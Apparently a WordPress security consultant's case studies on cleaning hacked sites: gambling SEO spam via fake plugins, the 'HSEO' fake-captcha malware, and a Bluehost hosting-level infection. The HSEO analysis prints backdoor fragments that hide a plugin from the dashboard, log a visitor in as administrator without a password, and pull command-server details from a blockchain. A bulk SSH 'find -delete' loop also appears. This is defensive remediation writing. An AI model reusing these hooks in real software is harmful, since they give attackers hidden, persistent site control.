In the SEO world, this is often called the “Japanese Keyword Hack” or “Pharma Hack.” Even though the links in this case were for betting (“Bahsegel”), the principle is the same.
Hackers hack legitimate sites (like yours) because your site has “Authority.” Google trusts your site. By putting their links on your site, they trick Google into thinking their illegal gambling sites are trusted too.
The Consequences for You:
Blacklisting: Google will eventually flag your site as “Deceptive.” Users will see a big red warning screen before they can enter your site.
SEO Loss: You will lose your rankings. If you sell shoes, but Google thinks you sell gambling links, you won’t appear in search results for shoes anymore.
Ad Suspension: If you run Google Ads or Facebook Ads, your accounts will be suspended because the destination URL is infected.
4. Step-by-Step Guide: How We Cleaned the Site
Fixing this is not as simple as clicking “Delete.” Because the malware creates users and hides in the database, you have to follow a strict process.
Here is exactly what we did.
Step 1: Maintenance Mode
First, we put the site in maintenance mode. We did this so users wouldn’t get redirected to the fake Cloudflare scam page while we were working.
Step 2: Clean the File System
We accessed the site using FTP (File Transfer Protocol). You can also use the File Manager in cPanel.
We went to /wp-content/plugins/ and deleted the three malicious folders:
wp-compat
woocommerce-page-homepage
easy-library-web-demo-1
Important: We checked the dates. The legitimate plugins were all modified months ago. The malicious folders were modified very recently. This is a good way to spot fake files.
Step 3: Clean the Database (Very Important)
This is the step most people miss. If you don’t do this, the hack will come back.
We opened phpMyAdmin from the hosting dashboard.
A. Delete the Ghost User
We opened the wp_users table. We saw the user adminbackup. We deleted that row entirely.
B. Delete Hidden Options
We opened the wp_options table. This table stores all your WordPress settings.
We searched for _pre_user_id. This is the setting the malware used to hide the admin ID. We deleted it.
We also searched for nitro_data and other weird entries created by the OperationGraph plugin and deleted them.
Step 4: Scan with Wordfence
After manually cleaning the obvious files, we installed the Wordfence Security plugin.
We ran a “High Sensitivity” scan. The scanner found two more files hidden in the /wp-content/uploads/ folder. They were named image.png but were actually PHP scripts. Hackers often hide backdoors in the uploads folder because it is the one folder that is “writable” by the server.
Step 5: Check “Must-Use” Plugins
We checked the /wp-content/mu-plugins/ folder. “MU Plugins” are special plugins that run automatically and cannot be turned off from the dashboard. Hackers love this folder. We found a small loader script there and deleted it.
Step 6: Fix the SEO (Google Search Console)
The site was clean, but Google still had the spam links in its memory.
We logged into Google Search Console.
We used the Removals Tool to temporarily block the spammy URLs.
We submitted the sitemap again.
We used the “Inspect URL” tool on the homepage and requested indexing. This tells Google: “The site is clean now, please look again.”
5. Prevention: How to Stop This From Happening Again
The entry point for this hack was an outdated plugin. The client had a “Slider” plugin that they hadn’t updated in 2 years. Hackers used a known security hole in that plugin to upload the first file.
Here is your checklist to stay safe:
1. Update Everything, Always: WordPress Core, themes, and plugins must be updated. Old software is the #1 way hackers get in.
2. Turn off File Editing: You can add a simple line of code to your wp-config.php file: define('DISALLOW_FILE_EDIT', true);
This stops anyone (including hackers) from editing your plugin files from inside the WordPress dashboard.
3. Use a Web Application Firewall (WAF): A firewall blocks bad traffic before it reaches your site. We recommend using Cloudflare (the real one) or the Wordfence Premium firewall.
4. Change Your Passwords: After a hack, you must assume every password was stolen. We changed the database password, the FTP password, and all WordPress admin passwords.
5. Check User Accounts Regularly: Once a month, go to your “Users” tab. If you see anyone you don’t recognize, delete them immediately.
6. Frequently Asked Questions (FAQs)
Q: Can I just restore a backup? A: Probably not. These viruses are designed to sit quietly for months (“incubation period”). If you restore a backup from last week, you are likely just restoring the virus. You need to clean the current files to be sure.
Q: Why do I see “Bahsegel” or Japanese characters in my search results? A: This is the SEO spam injection. The hacker’s script (main.php) specifically showed these words to Google to boost the ranking of their gambling sites. It will take a few weeks for Google to clear them after you fix the site.
Q: What is wp-compat.php? A: It is a fake plugin file used by hackers. It pretends to be a WordPress compatibility patch, but it actually creates a hidden administrator user so the hacker can always access your site.
Q: Is my site safe to visit now? A: If you have followed the steps above (removed files, cleaned database, scanned with Wordfence), yes. However, you should clear your browser cache to stop seeing the old redirected pages.
Summary
Hackers are getting smarter. They don’t just break your site anymore; they use it to make money. They use fake plugins like wp-compat and OperationGraph to hide tracks and main.php to serve spam.
By understanding how these files work, you can spot them early. Always look for plugins you didn’t install, users you didn’t create, and strange links in your source code.
If you found this case study helpful, or if you are currently dealing with a hacked site, leave a comment below.
It starts with a complaint from a visitor, or maybe you saw it yourself while checking your site on mobile. You open your homepage, and instead of your content, you are blocked by a blurry screen and a Google reCAPTCHA box asking you to confirm “I’m not a robot.”
Here is the bad news: That is not a real Google Captcha. It is a trap.
Clicking that box doesn’t verify you; it executes malicious JavaScript that redirects your visitors to scam sites, gambling portals, or tech support hoaxes. This is the visible face of a stealthy, high-tech infection known as the “HSEO” Malware.
The Diagnosis: It’s Hiding in Plain Sight
If you check your WordPress plugins list, everything looks normal. You won’t see anything suspicious. That is by design.
I recently dissected this malware. It installs itself as a plugin (often named hseo), but it uses a specific line of code to erase itself from your dashboard view.
Here is the actual code from the malware ensuring you never find it:
functionplugin_list($plugins) {
if (isset($plugins["active"]["hseo/hseo.php"])) {
unset($plugins["all"]["hseo/hseo.php"]); // Deletes itself from the 'All' listunset($plugins["active"]["hseo/hseo.php"]); // Deletes itself from the 'Active' list
}
return$plugins;
}
Because of this, you can’t click “Deactivate.” You have to remove it via your file manager.
The “HSEO” Anatomy: How It Controls Your Site
This isn’t just a redirect script; it is a full-featured “Backdoor.” Based on our code analysis, here are the terrifying capabilities this malware gives the attacker.
1. The “Super Admin” Bypass
The attackers don’t need to crack your password. They created a secret key for themselves. The malware contains a function called get_al that scans your database for the first administrator account and logs the attacker in automatically if they visit a specific URL.
functionget_al() {
// Finds the first admin user$admins = get_users(["role" => "administrator"]);
$user_id = $admins[0]->ID;
// Logs them in instantly without a password
wp_set_auth_cookie($user_id);
}
2. The Blockchain Connection (Unstoppable Commands)
This is where the malware gets incredibly sophisticated. Usually, security plugins block malware by blacklisting the attacker’s server IP.
To get around this, the HSEO malware uses the Binance Smart Chain (crypto blockchain) to receive instructions. It connects to the blockchain, reads a specific transaction hash, and extracts the IP address of the command server from that transaction.
Because the blockchain is public and immutable, security software cannot “block” the source of the configuration.
// Connects to BSC Testnet Public Node$url = 'https://bsc-testnet-rpc.publicnode.com/';
// Decodes hidden instructions from the blockchain$answer = str_replace("0x", "", $json['result']);
3. The Fake Captcha Injection
That “I’m not a robot” pop-up you see? It is generated by a massive block of obfuscated JavaScript injected into your site’s header.
The function name wp_smile_face is a cruel joke by the developers. It’s what hijacks your user’s browser.
How to Fix It (Immediate Steps)
If you see the fake Captcha, your site is compromised. Do not wait.
Access Your File Manager: You cannot fix this from the WordPress dashboard. Log in to your hosting Control Panel (cPanel) or use FTP.
Find the Folder: Navigate to /wp-content/plugins/.
Delete “HSEO”: Look for a folder named hseo. Delete the entire folder.
Check for constants.php: If you see a file named constants.php inside the main plugin directory, delete it too.
Change Your Salts: Open your wp-config.php file and change the security keys (Salts). This will force-logout the attackers.
Scan Your Database: Since the attacker had admin access, check for any rogue administrator users they may have created and delete them.
Summary
The “Fake Captcha” hack is one of the most frustrating experiences for a site owner because it destroys visitor trust immediately.
The HSEO malware represents a new wave of attacks using blockchain technology and stealth hooks to evade detection. If you are unsure how to remove this, contact a WordPress security specialist immediately.
A client contacted me after Bluehost completely suspended their hosting account due to malware detection.
Unlike typical WordPress infections, this case involved a large number of malicious executable files scattered across the hosting account, listed by Bluehost in a file named malware_bin.txt.
Bluehost clearly stated that all listed files must be deleted before account access could be restored.
If even one file remained, the account could be reinfected and suspended again.
This was not a standard WordPress cleanup. This was a hosting-level malware incident.
Initial Assessment
The hosting account contained multiple WordPress sites, and malware was detected in areas often considered safe, such as:
This step is critical.
Mass deletion without a backup can permanently break websites or destroy forensic evidence.
Malware Cleanup Strategy
Identifying the Malware
From malware_bin.txt, I extracted approximately 50–80 unique malicious file names.
These filenames appeared repeatedly across different directories in the hosting account.
Each filename was manually reviewed to confirm:
It was not part of WordPress core
It was not used by any plugin or theme
It was not a legitimate application file
Only after verification was removal approved.
Why Manual Deletion Was Not an Option
Files were scattered across hundreds of directories
Many filenames appeared multiple times
Missing even one file could re-trigger the infection
cPanel file managers are too limited for this scope
This required a server-level, SSH-based automated cleanup.
⚠️ Warning: Advanced Malware Removal – Only Attempt If You Have Server Experience
This case study describes a highly technical, server-level malware removal process involving SSH access, filename loops, and manual deletions across WordPress plugins, themes, and hosting directories.
Do not attempt this if you are not experienced with Linux, SSH, or WordPress server administration.
Mistakes can lead to:
Permanent data loss
Broken WordPress installations
Re-infection of your hosting account
Possible hosting account suspension
If you are unsure, it’s strongly recommended to hire a professional to safely perform these steps.
SSH-Based Malware Removal Using a Loop
To ensure complete removal, I used an SSH loop that iterated through the list of malicious filenames and deleted every occurrence across the entire hosting account.
Simplified Example of the Logic Used
files=(
"rvsMasterCompoDB"
"phpthumb.unsharp"
"currencyVars.inc"
"cron.bak"
"toolbadex.hacked"
".key-daemon"
".pulse-listener"
".sys-config"
"bigocaptcha"
)
for file in "${files[@]}"; do
find /home/username/ -type f -name "$file" -delete
done
This method ensured that:
All malicious files were located regardless of directory depth
Duplicate payloads were fully removed
No reinfection vectors were left behind
Cleanup was consistent and verifiable
This level of cleanup cannot be achieved using WordPress plugins or control panel tools.
Post-Cleanup Verification
After removal:
File permissions were reviewed
No unexpected executable or system-like files remained
WordPress core integrity was validated
Bluehost re-scanned the hosting account
The hosting account was fully restored.
No reinfection occurred.
Key Takeaways From This Case
Not all WordPress malware lives inside WordPress
Executable files in a WordPress hosting account are a major red flag
Hosting providers often detect malware that plugins miss
Cleaning only wp-content is not enough
SSH-level access is critical for serious infections
If your hosting provider suspends your account, the problem is often bigger than WordPress itself.
How to Prevent This Type of Infection
Restrict executable permissions on shared hosting
Regularly scan non-WordPress directories
Do not rely solely on security plugins
Harden hosting-level security, not just WordPress
Without these steps, reinfection is only a matter of time.
Final Note
If your hosting provider has:
Disabled your account
Sent a malware report you do not understand
Flagged executable or system-style files
Rejected plugin-based cleanups
You are dealing with a server-level or shared hosting malware infection.
This type of issue requires manual, SSH-based remediation, not automated tools.
For professional cleanup, reinfection prevention, and hosting restoration, you can reach me through mdpabel.com.
